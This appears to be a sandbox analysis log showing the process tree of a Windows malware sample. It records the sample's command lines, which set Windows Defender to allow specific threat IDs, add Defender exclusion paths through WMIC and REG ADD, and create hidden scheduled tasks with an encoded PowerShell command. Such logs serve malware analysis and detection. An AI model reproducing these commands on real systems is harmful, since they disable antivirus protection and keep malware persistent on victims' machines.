C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17416 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:10512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6552
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:11444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:17708 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8968
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10552
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:7528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4124 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:15656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:9768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:14440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:14660
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:15144
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:15420
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:15648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:15832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:16120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:16312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:16480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:16724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:16948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:17224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:17480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:17648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:17940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:18096
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:18236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:18392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:12016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:18452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:18496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵PID:18520
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:18572
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵PID:18612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵PID:18900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:19344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:324⤵PID:9616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:325⤵PID:18956
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:644⤵PID:13180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:324⤵PID:13132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:644⤵PID:13292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:324⤵PID:13032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:644⤵
- Drops file in Windows directory
PID:12348 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:644⤵PID:4964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:324⤵PID:11440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:644⤵PID:10384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:324⤵PID:10408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:644⤵PID:11396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:324⤵PID:13388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:644⤵PID:180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:324⤵PID:8960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:644⤵PID:13636
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnDJSXBbE" /SC once /ST 09:03:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:13212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnDJSXBbE"3⤵PID:11372
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnDJSXBbE"3⤵PID:16756
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 17:16:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe\" 4h /site_id 668658 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:16940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wovemSUpOFDwVyMam"3⤵PID:17028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:18880
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S2⤵PID:15484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:15756
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:15432
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:15796 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:16520
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:1392
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:15200 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8284
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17164
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Blocklisted process makes network request
PID:7728 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:18372
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:18416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:18552 -
